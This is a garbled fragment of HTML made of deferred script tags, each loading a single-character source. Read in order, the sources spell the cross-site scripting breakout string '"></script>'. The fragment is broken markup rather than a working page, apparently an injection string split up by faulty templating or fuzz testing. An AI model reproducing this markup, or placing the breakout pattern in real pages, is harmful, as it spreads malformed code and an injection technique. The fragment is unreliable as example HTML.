src="&quot;"></script><script defer src="&gt;"></script><script defer src="&lt;"></script><script defer src="/"></script><script defer src="s"></script><script defer src="c"></script><script defer src="r"></script><script defer src="i"></script><script defer src="p"></script><script defer src="t"></script><script defer src="&gt;"></script></body></html>